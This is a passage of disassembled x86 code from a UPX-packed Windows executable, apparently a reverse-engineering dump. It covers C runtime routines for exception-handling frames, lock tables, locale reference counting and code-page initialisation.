push [ebp+arg_1C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call sub_407321
add esp, 20h
loc_40776B: ; CODE XREF: sub_40768F+43�j
; sub_40768F+53�j ...
xor eax, eax
inc eax
loc_40776E: ; CODE XREF: sub_40768F+BE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40768F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407773 proc near ; CODE XREF: sub_405ED8:loc_405F0B�p
; sub_406B72+22�j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040779A SIZE 00000012 BYTES
push 8
push offset dword_40E0E8
call __SEH_prolog4
call sub_404927
mov eax, [eax+78h]
test eax, eax
jz short loc_4077A1
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40779A
sub_407773 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_407773
loc_40779A: ; CODE XREF: sub_407773+1E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_4077A1: ; CODE XREF: sub_407773+16�j
call loc_409D40
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_407773
; =============== S U B R O U T I N E =======================================
sub_4077AC proc near ; CODE XREF: sub_406DCE+23�p
call sub_404927
mov eax, [eax+7Ch]
test eax, eax
jz short loc_4077BA
call eax
loc_4077BA: ; CODE XREF: sub_4077AC+A�j
jmp sub_407773
sub_4077AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077BF proc near ; CODE XREF: sub_4043F8+1C�p
; sub_4043F8:loc_404459�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset dword_40E108
call __SEH_prolog4
push ds:dword_4105D8
call sub_40470B
pop ecx
test eax, eax
jz short loc_4077F1
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_4077EA
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_4077EA: ; CODE XREF: sub_4077BF+22�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_4077F1: ; CODE XREF: sub_4077BF+1A�j
jmp sub_407773
sub_4077BF endp
; =============== S U B R O U T I N E =======================================
sub_4077F6 proc near ; CODE XREF: sub_405819+33�p
push offset sub_407773
call sub_404694
pop ecx
mov ds:dword_4105D8, eax
retn
sub_4077F6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407810 proc near ; CODE XREF: sub_404500+4A�p
; sub_406BB6+77�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_409F40
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_40784F
mov ecx, 2
loc_40784F: ; CODE XREF: sub_407810+38�j
push ecx
call sub_409F40
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_407810 endp
; =============== S U B R O U T I N E =======================================
sub_40785C proc near ; CODE XREF: sub_404A60+10C�p
push esi
push edi
xor esi, esi
mov edi, offset dword_4105E0
loc_407865: ; CODE XREF: sub_40785C+35�j
cmp ds:dword_40F3A4[esi*8], 1
jnz short loc_40788D
lea eax, ds:40F3A0h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_409843
test eax, eax
pop ecx
pop ecx
jz short loc_407899
loc_40788D: ; CODE XREF: sub_40785C+11�j
inc esi
cmp esi, 24h
jl short loc_407865
xor eax, eax
inc eax
loc_407896: ; CODE XREF: sub_40785C+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_407899: ; CODE XREF: sub_40785C+2F�j
and ds:off_40F3A0[esi*8], 0
xor eax, eax
jmp short loc_407896
sub_40785C endp
; =============== S U B R O U T I N E =======================================
sub_4078A5 proc near ; CODE XREF: sub_4047B4:loc_4047EC�j
push ebx
mov ebx, dword_40C0BC
push esi
mov esi, offset off_40F3A0
push edi
loc_4078B3: ; CODE XREF: sub_4078A5+30�j
mov edi, [esi]
test edi, edi
jz short loc_4078CC
cmp dword ptr [esi+4], 1
jz short loc_4078CC
push edi
call ebx ; dword_40C0BC
push edi
call sub_404F20
and dword ptr [esi], 0
pop ecx
loc_4078CC: ; CODE XREF: sub_4078A5+12�j
; sub_4078A5+18�j
add esi, 8
cmp esi, offset off_40F4C0
jl short loc_4078B3
mov esi, offset off_40F3A0
pop edi
loc_4078DD: ; CODE XREF: sub_4078A5+50�j
mov eax, [esi]
test eax, eax
jz short loc_4078EC
cmp dword ptr [esi+4], 1
jnz short loc_4078EC
push eax
call ebx ; dword_40C0BC
loc_4078EC: ; CODE XREF: sub_4078A5+3C�j
; sub_4078A5+42�j
add esi, 8
cmp esi, offset off_40F4C0
jl short loc_4078DD
pop esi
pop ebx
retn
sub_4078A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078FA proc near ; CODE XREF: sub_4048A7+2�p
; sub_404A4B+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ds:off_40F3A0[eax*8]
call dword_40C0DC ; RtlLeaveCriticalSection
pop ebp
retn
sub_4078FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40790F proc near ; CODE XREF: sub_4079D2+14�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40E128
call __SEH_prolog4
xor edi, edi
inc edi
mov [ebp+var_1C], edi
xor ebx, ebx
cmp ds:dword_4105D4, ebx
jnz short loc_407943
call sub_4060C3
push 1Eh
call sub_405F23
push 0FFh
call sub_405593
pop ecx
pop ecx
loc_407943: ; CODE XREF: sub_40790F+1A�j
mov esi, [ebp+arg_0]
lea esi, ds:40F3A0h[esi*8]
cmp [esi], ebx
jz short loc_407955
mov eax, edi
jmp short loc_4079C3
; ---------------------------------------------------------------------------
loc_407955: ; CODE XREF: sub_40790F+40�j
push 18h
call sub_4053D3
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_407972
call sub_4053C0
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4079C3
; ---------------------------------------------------------------------------
loc_407972: ; CODE XREF: sub_40790F+52�j
push 0Ah
call sub_4079D2
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_4079AD
push 0FA0h
push edi
call sub_409843
pop ecx
pop ecx
test eax, eax
jnz short loc_4079A9
push edi
call sub_404F20
pop ecx
call sub_4053C0
mov dword ptr [eax], 0Ch
mov [ebp+var_1C], ebx
jmp short loc_4079B4
; ---------------------------------------------------------------------------
loc_4079A9: ; CODE XREF: sub_40790F+81�j
mov [esi], edi
jmp short loc_4079B4
; ---------------------------------------------------------------------------
loc_4079AD: ; CODE XREF: sub_40790F+70�j
push edi
call sub_404F20
pop ecx
loc_4079B4: ; CODE XREF: sub_40790F+98�j
; sub_40790F+9C�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4079C9
mov eax, [ebp+var_1C]
loc_4079C3: ; CODE XREF: sub_40790F+44�j
; sub_40790F+61�j
call __SEH_epilog4
retn
sub_40790F endp
; =============== S U B R O U T I N E =======================================
sub_4079C9 proc near ; CODE XREF: sub_40790F+AC�p
; DATA XREF: UPX1:0040E140�o
push 0Ah
call sub_4078FA
pop ecx
retn
sub_4079C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079D2 proc near ; CODE XREF: sub_4047F1+7F�p
; sub_40493F+7E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:40F3A0h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_4079F8
push eax
call sub_40790F
test eax, eax
pop ecx
jnz short loc_4079F8
push 11h
call sub_405549
pop ecx
loc_4079F8: ; CODE XREF: sub_4079D2+11�j
; sub_4079D2+1C�j
push dword ptr [esi]
call dword_40C0E0 ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_4079D2 endp
; =============== S U B R O U T I N E =======================================
sub_407A03 proc near ; CODE XREF: sub_40493F+E8�p
; sub_407C55+31�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+0BCh]
xor ebp, ebp
cmp eax, ebp
push edi
jz short loc_407A86
cmp eax, offset off_40FBE0
jz short loc_407A86
mov eax, [esi+0B0h]
cmp eax, ebp
jz short loc_407A86
cmp [eax], ebp
jnz short loc_407A86
mov eax, [esi+0B8h]
cmp eax, ebp
jz short loc_407A4D
cmp [eax], ebp
jnz short loc_407A4D
push eax
call sub_404F20
push dword ptr [esi+0BCh]
call sub_40A13B
pop ecx
pop ecx
loc_407A4D: ; CODE XREF: sub_407A03+31�j
; sub_407A03+35�j
mov eax, [esi+0B4h]
cmp eax, ebp
jz short loc_407A6E
cmp [eax], ebp
jnz short loc_407A6E
push eax
call sub_404F20
push dword ptr [esi+0BCh]
call sub_40A0FB
pop ecx
pop ecx
loc_407A6E: ; CODE XREF: sub_407A03+52�j
; sub_407A03+56�j
push dword ptr [esi+0B0h]
call sub_404F20
push dword ptr [esi+0BCh]
call sub_404F20
pop ecx
pop ecx
loc_407A86: ; CODE XREF: sub_407A03+12�j
; sub_407A03+19�j ...
mov eax, [esi+0C0h]
cmp eax, ebp
jz short loc_407AD4
cmp [eax], ebp
jnz short loc_407AD4
mov eax, [esi+0C4h]
sub eax, 0FEh
push eax
call sub_404F20
mov eax, [esi+0CCh]
mov edi, 80h
sub eax, edi
push eax
call sub_404F20
mov eax, [esi+0D0h]
sub eax, edi
push eax
call sub_404F20
push dword ptr [esi+0C0h]
call sub_404F20
add esp, 10h
loc_407AD4: ; CODE XREF: sub_407A03+8B�j
; sub_407A03+8F�j
lea edi, [esi+0D4h]
mov eax, [edi]
cmp eax, offset off_40FB20
jz short loc_407AFA
cmp [eax+0B4h], ebp
jnz short loc_407AFA
push eax
call sub_409F6B
push dword ptr [edi]
call sub_404F20
pop ecx
pop ecx
loc_407AFA: ; CODE XREF: sub_407A03+DE�j
; sub_407A03+E6�j
push 6
lea edi, [esi+50h]
pop ebx
loc_407B00: ; CODE XREF: sub_407A03+132�j
cmp dword ptr [edi-8], offset dword_40F4C8
jz short loc_407B1A
mov eax, [edi]
cmp eax, ebp
jz short loc_407B1A
cmp [eax], ebp
jnz short loc_407B1A
push eax
call sub_404F20
pop ecx
loc_407B1A: ; CODE XREF: sub_407A03+104�j
; sub_407A03+10A�j ...
cmp [edi-4], ebp
jz short loc_407B31
mov eax, [edi+4]
cmp eax, ebp
jz short loc_407B31
cmp [eax], ebp
jnz short loc_407B31
push eax
call sub_404F20
pop ecx
loc_407B31: ; CODE XREF: sub_407A03+11A�j
; sub_407A03+121�j ...
add edi, 10h
dec ebx
jnz short loc_407B00
push esi
call sub_404F20
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_407A03 endp
; =============== S U B R O U T I N E =======================================
sub_407B43 proc near ; CODE XREF: sub_4047F1+9E�p
; sub_407C55+12�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, dword_40C07C
push esi
call edi ; dword_40C07C
mov eax, [esi+0B0h]
test eax, eax
jz short loc_407B61
push eax
call edi ; dword_40C07C
loc_407B61: ; CODE XREF: sub_407B43+19�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_407B6E
push eax
call edi ; dword_40C07C
loc_407B6E: ; CODE XREF: sub_407B43+26�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_407B7B
push eax
call edi ; dword_40C07C
loc_407B7B: ; CODE XREF: sub_407B43+33�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_407B88
push eax
call edi ; dword_40C07C
loc_407B88: ; CODE XREF: sub_407B43+40�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_407B8E: ; CODE XREF: sub_407B43+71�j
cmp dword ptr [ebx-8], offset dword_40F4C8
jz short loc_407BA0
mov eax, [ebx]
test eax, eax
jz short loc_407BA0
push eax
call edi ; dword_40C07C
loc_407BA0: ; CODE XREF: sub_407B43+52�j
; sub_407B43+58�j
cmp dword ptr [ebx-4], 0
jz short loc_407BB0
mov eax, [ebx+4]
test eax, eax
jz short loc_407BB0
push eax
call edi ; dword_40C07C
loc_407BB0: ; CODE XREF: sub_407B43+61�j
; sub_407B43+68�j
add ebx, 10h
dec ebp
jnz short loc_407B8E
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; dword_40C07C
pop edi
pop esi
pop ebp
pop ebx
retn
sub_407B43 endp
; =============== S U B R O U T I N E =======================================
sub_407BC9 proc near ; CODE XREF: sub_40493F+CC�p
; sub_407C55+1D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_407C51
push ebx
push ebp
push edi
mov edi, dword_40C08C
push esi
call edi ; dword_40C08C
mov eax, [esi+0B0h]
test eax, eax
jz short loc_407BEB
push eax
call edi ; dword_40C08C
loc_407BEB: ; CODE XREF: sub_407BC9+1D�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_407BF8
push eax
call edi ; dword_40C08C
loc_407BF8: ; CODE XREF: sub_407BC9+2A�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_407C05
push eax
call edi ; dword_40C08C
loc_407C05: ; CODE XREF: sub_407BC9+37�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_407C12
push eax
call edi ; dword_40C08C
loc_407C12: ; CODE XREF: sub_407BC9+44�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_407C18: ; CODE XREF: sub_407BC9+75�j
cmp dword ptr [ebx-8], offset dword_40F4C8
jz short loc_407C2A
mov eax, [ebx]
test eax, eax
jz short loc_407C2A
push eax
call edi ; dword_40C08C
loc_407C2A: ; CODE XREF: sub_407BC9+56�j
; sub_407BC9+5C�j
cmp dword ptr [ebx-4], 0
jz short loc_407C3A
mov eax, [ebx+4]
test eax, eax
jz short loc_407C3A
push eax
call edi ; dword_40C08C
loc_407C3A: ; CODE XREF: sub_407BC9+65�j
; sub_407BC9+6C�j
add ebx, 10h
dec ebp
jnz short loc_407C18
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; dword_40C08C
pop edi
pop ebp
pop ebx
loc_407C51: ; CODE XREF: sub_407BC9+7�j
mov eax, esi
pop esi
retn
sub_407BC9 endp
; =============== S U B R O U T I N E =======================================
sub_407C55 proc near ; CODE XREF: sub_407C93+54�p
test edi, edi
jz short loc_407C90
test eax, eax
jz short loc_407C90
push esi
mov esi, [eax]
cmp esi, edi
jz short loc_407C8C
push edi
mov [eax], edi
call sub_407B43
test esi, esi
pop ecx
jz short loc_407C8C
push esi
call sub_407BC9
cmp dword ptr [esi], 0
pop ecx
jnz short loc_407C8C
cmp esi, offset dword_40F4D0
jz short loc_407C8C
push esi
call sub_407A03
pop ecx
loc_407C8C: ; CODE XREF: sub_407C55+D�j
; sub_407C55+1A�j ...
mov eax, edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_407C90: ; CODE XREF: sub_407C55+2�j
; sub_407C55+6�j
xor eax, eax
retn
sub_407C55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C93 proc near ; CODE XREF: sub_407FBB+37�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_40E148
call __SEH_prolog4
call sub_404927
mov esi, eax
mov eax, ds:dword_40FC14
test [esi+70h], eax
jz short loc_407CD2
cmp dword ptr [esi+6Ch], 0
jz short loc_407CD2
call sub_404927
mov esi, [eax+6Ch]
loc_407CBE: ; CODE XREF: sub_407C93+68�j
test esi, esi
jnz short loc_407CCA
push 20h
call sub_405549
pop ecx
loc_407CCA: ; CODE XREF: sub_407C93+2D�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_407CD2: ; CODE XREF: sub_407C93+1B�j
; sub_407C93+21�j
push 0Ch
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
lea eax, [esi+6Ch]
mov edi, ds:off_40F5A8
call sub_407C55
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407CFD
jmp short loc_407CBE
sub_407C93 endp
; =============== S U B R O U T I N E =======================================
sub_407CFD proc near ; CODE XREF: sub_407C93+63�p
; DATA XREF: UPX1:0040E160�o
push 0Ch
call sub_4078FA
pop ecx
mov esi, [ebp-1Ch]
retn
sub_407CFD endp
; =============== S U B R O U T I N E =======================================
sub_407D09 proc near ; CODE XREF: sub_4080B7+14C�p
; sub_4080B7+1A1�p
sub eax, 3A4h
jz short loc_407D32
sub eax, 4
jz short loc_407D2C
sub eax, 0Dh
jz short loc_407D26
dec eax
jz short loc_407D20
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_407D20: ; CODE XREF: sub_407D09+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_407D26: ; CODE XREF: sub_407D09+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407D09+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_407D32: ; CODE XREF: sub_407D09+5�j
mov eax, 411h
retn
sub_407D09 endp
; =============== S U B R O U T I N E =======================================
sub_407D38 proc near ; CODE XREF: sub_4080B7+2B�p
push ebx
push ebp
push esi
push edi
mov ebp, 101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, [esi+1Ch]
push edi
push ebx
call sub_4021D0
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
xor eax, eax
lea edi, [esi+10h]
stosd
stosd
stosd
mov eax, offset dword_40F5B8
add esp, 0Ch
sub eax, esi
loc_407D6B: ; CODE XREF: sub_407D38+3A�j
mov cl, [eax+ebx]
mov [ebx], cl
inc ebx
dec ebp
jnz short loc_407D6B
lea ecx, [esi+11Dh]
mov esi, 100h
loc_407D7F: ; CODE XREF: sub_407D38+4E�j
mov dl, [ecx+eax]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_407D7F
pop edi
pop esi
pop ebp
pop ebx
retn
sub_407D38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=49Ch
sub_407D8D proc near ; CODE XREF: sub_4080B7+16F�p
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_512 = byte ptr -512h
var_511 = byte ptr -511h
var_504 = word ptr -504h
var_304 = byte ptr -304h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-49Ch]
sub esp, 51Ch
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+49Ch+var_4], eax
push ebx
push edi
lea eax, [ebp+49Ch+var_518]
push eax
push dword ptr [esi+4]
call dword_40C0E4 ; GetCPInfo
test eax, eax
mov edi, 100h
jz loc_407EB3
xor eax, eax
loc_407DC6: ; CODE XREF: sub_407D8D+43�j
mov [ebp+eax+49Ch+var_104], al
inc eax
cmp eax, edi
jb short loc_407DC6
mov al, [ebp+49Ch+var_512]
test al, al
mov [ebp+49Ch+var_104], 20h
jz short loc_407E0B
lea ebx, [ebp+49Ch+var_511]
loc_407DE3: ; CODE XREF: sub_407D8D+7C�j
movzx ecx, al
movzx eax, byte ptr [ebx]
cmp ecx, eax
ja short loc_407E03
sub eax, ecx
inc eax
push eax
lea edx, [ebp+ecx+49Ch+var_104]
push 20h
push edx
call sub_4021D0
add esp, 0Ch
loc_407E03: ; CODE XREF: sub_407D8D+5E�j
inc ebx
mov al, [ebx]
inc ebx
test al, al
jnz short loc_407DE3
loc_407E0B: ; CODE XREF: sub_407D8D+51�j
push 0
push dword ptr [esi+0Ch]
lea eax, [ebp+49Ch+var_504]
push dword ptr [esi+4]
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 1
push 0
call sub_40A3DE
xor ebx, ebx
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_204]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push edi
push dword ptr [esi+0Ch]
push ebx
call sub_40A802
add esp, 44h
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_304]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 200h
push dword ptr [esi+0Ch]
push ebx
call sub_40A802
add esp, 24h
xor eax, eax
loc_407E72: ; CODE XREF: sub_407D8D+122�j
movzx ecx, [ebp+eax*2+49Ch+var_504]
test cl, 1
jz short loc_407E8A
or byte ptr [esi+eax+1Dh], 10h
mov cl, [ebp+eax+49Ch+var_204]
jmp short loc_407E9B
; ---------------------------------------------------------------------------
loc_407E8A: ; CODE XREF: sub_407D8D+ED�j
test cl, 2
jz short loc_407EA4
or byte ptr [esi+eax+1Dh], 20h
mov cl, [ebp+eax+49Ch+var_304]
loc_407E9B: ; CODE XREF: sub_407D8D+FB�j
mov [esi+eax+11Dh], cl
jmp short loc_407EAC
; ---------------------------------------------------------------------------
loc_407EA4: ; CODE XREF: sub_407D8D+100�j
mov byte ptr [esi+eax+11Dh], 0
loc_407EAC: ; CODE XREF: sub_407D8D+115�j
inc eax
cmp eax, edi
jb short loc_407E72
jmp short loc_407F00
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407D8D+31�j
lea eax, [esi+11Dh]
mov [ebp+49Ch+var_51C], 0FFFFFF9Fh
xor ecx, ecx
sub [ebp+49Ch+var_51C], eax
loc_407EC5: ; CODE XREF: sub_407D8D+171�j
mov edx, [ebp+49Ch+var_51C]
lea eax, [esi+ecx+11Dh]
add edx, eax
lea ebx, [edx+20h]
cmp ebx, 19h
ja short loc_407EE5
or byte ptr [esi+ecx+1Dh], 10h
mov dl, cl
add dl, 20h
jmp short loc_407EF4
; ---------------------------------------------------------------------------
loc_407EE5: ; CODE XREF: sub_407D8D+14A�j
cmp edx, 19h
ja short loc_407EF8
or byte ptr [esi+ecx+1Dh], 20h
mov dl, cl
sub dl, 20h
loc_407EF4: ; CODE XREF: sub_407D8D+156�j
mov [eax], dl
jmp short loc_407EFB
; ---------------------------------------------------------------------------
loc_407EF8: ; CODE XREF: sub_407D8D+15B�j
mov byte ptr [eax], 0
loc_407EFB: ; CODE XREF: sub_407D8D+169�j
inc ecx
cmp ecx, edi
jb short loc_407EC5
loc_407F00: ; CODE XREF: sub_407D8D+124�j
mov ecx, [ebp+49Ch+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_40224A
add ebp, 49Ch
leave
retn
sub_407D8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F17 proc near ; CODE XREF: sub_407FBB+57�p
; sub_408290+1A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_40E168
call __SEH_prolog4
call sub_404927
mov edi, eax
mov eax, ds:dword_40FC14
test [edi+70h], eax
jz short loc_407F51
cmp dword ptr [edi+6Ch], 0
jz short loc_407F51
mov esi, [edi+68h]
loc_407F3D: ; CODE XREF: sub_407F17+96�j
test esi, esi
jnz short loc_407F49
push 20h
call sub_405549
pop ecx
loc_407F49: ; CODE XREF: sub_407F17+28�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_407F51: ; CODE XREF: sub_407F17+1B�j
; sub_407F17+21�j
push 0Dh
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [edi+68h]
mov [ebp+var_1C], esi
cmp esi, ds:off_40F9E0
jz short loc_407FA1
test esi, esi
jz short loc_407F89
push esi
call dword_40C08C ; InterlockedDecrement
test eax, eax
jnz short loc_407F89
cmp esi, offset dword_40F5B8
jz short loc_407F89
push esi
call sub_404F20
pop ecx
loc_407F89: ; CODE XREF: sub_407F17+56�j
; sub_407F17+61�j ...
mov eax, ds:off_40F9E0
mov [edi+68h], eax
mov esi, ds:off_40F9E0
mov [ebp+var_1C], esi
push esi
call dword_40C07C ; InterlockedIncrement
loc_407FA1: ; CODE XREF: sub_407F17+52�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407FB2
jmp short loc_407F3D
sub_407F17 endp
; =============== S U B R O U T I N E =======================================
sub_407FAF proc near ; DATA XREF: UPX1:0040E180�o
mov esi, [ebp-1Ch]
sub_407FAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407FB2 proc near ; CODE XREF: sub_407F17+91�p
push 0Dh
call sub_4078FA
pop ecx
retn
sub_407FB2 endp
; =============== S U B R O U T I N E =======================================
sub_407FBB proc near ; CODE XREF: sub_40803D+D�p
; sub_409CCF+C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 0
jnz short loc_40802D
call sub_404927
mov [esi+8], eax
mov ecx, [eax+6Ch]
mov [esi], ecx
mov ecx, [eax+68h]
mov [esi+4], ecx
mov ecx, [esi]
cmp ecx, ds:off_40F5A8
jz short loc_407FF9
mov ecx, ds:dword_40FC14
test [eax+70h], ecx
jnz short loc_407FF9
call sub_407C93
mov [esi], eax
loc_407FF9: ; CODE XREF: sub_407FBB+2A�j
; sub_407FBB+35�j
mov eax, [esi+4]
cmp eax, ds:off_40F9E0
jz short loc_40801A
mov eax, [esi+8]
mov ecx, ds:dword_40FC14
test [eax+70h], ecx
jnz short loc_40801A
call sub_407F17
mov [esi+4], eax
loc_40801A: ; CODE XREF: sub_407FBB+47�j
; sub_407FBB+55�j
mov eax, [esi+8]
test byte ptr [eax+70h], 2
jnz short loc_408037
or dword ptr [eax+70h], 2
mov byte ptr [esi+0Ch], 1
jmp short loc_408037
; ---------------------------------------------------------------------------
loc_40802D: ; CODE XREF: sub_407FBB+D�j
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
loc_408037: ; CODE XREF: sub_407FBB+66�j
; sub_407FBB+70�j
mov eax, esi
pop esi
retn 4
sub_407FBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40803D proc near ; CODE XREF: sub_4080B7+19�p
; sub_408290+25�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
lea ecx, [ebp+var_10]
call sub_407FBB
cmp esi, 0FFFFFFFEh
mov ds:dword_410754, ebx
jnz short loc_408078
mov ds:dword_410754, 1
call dword_40C0EC ; GetOEMCP
loc_40806A: ; CODE XREF: sub_40803D+50�j
; sub_40803D+67�j
cmp [ebp+var_4], bl
jz short loc_4080B4
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_4080B4
; ---------------------------------------------------------------------------
loc_408078: ; CODE XREF: sub_40803D+1B�j
cmp esi, 0FFFFFFFDh
jnz short loc_40808F
mov ds:dword_410754, 1
call dword_40C0E8 ; GetACP
jmp short loc_40806A
; ---------------------------------------------------------------------------
loc_40808F: ; CODE XREF: sub_40803D+3E�j
cmp esi, 0FFFFFFFCh
jnz short loc_4080A6
mov eax, [ebp+var_10]
mov eax, [eax+4]
mov ds:dword_410754, 1
jmp short loc_40806A
; ---------------------------------------------------------------------------
loc_4080A6: ; CODE XREF: sub_40803D+55�j
cmp [ebp+var_4], bl
jz short loc_4080B2
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4080B2: ; CODE XREF: sub_40803D+6C�j
mov eax, esi
loc_4080B4: ; CODE XREF: sub_40803D+30�j
; sub_40803D+39�j
pop ebx
leave
retn
sub_40803D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080B7 proc near ; CODE XREF: sub_408290+5E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
call sub_40803D
mov edi, eax
xor esi, esi
cmp edi, esi
mov [ebp+arg_0], edi
jnz short loc_4080EE
loc_4080E0: ; CODE XREF: sub_4080B7+1C1�j
mov eax, ebx
call sub_407D38
loc_4080E7: ; CODE XREF: sub_4080B7+174�j
xor eax, eax
jmp loc_408281
; ---------------------------------------------------------------------------
loc_4080EE: ; CODE XREF: sub_4080B7+27�j
mov [ebp+var_1C], esi
xor eax, eax
loc_4080F3: ; CODE XREF: sub_4080B7+53�j
cmp ds:dword_40F9E8[eax], edi
jz loc_408190
inc [ebp+var_1C]
add eax, 30h
cmp eax, 0F0h
jb short loc_4080F3
cmp edi, 0FDE8h
jz loc_40827E
cmp edi, 0FDE9h
jz loc_40827E
movzx eax, di
push eax
call dword_40C0F0 ; IsValidCodePage
test eax, eax
jz loc_40827E
lea eax, [ebp+var_18]
push eax
push edi
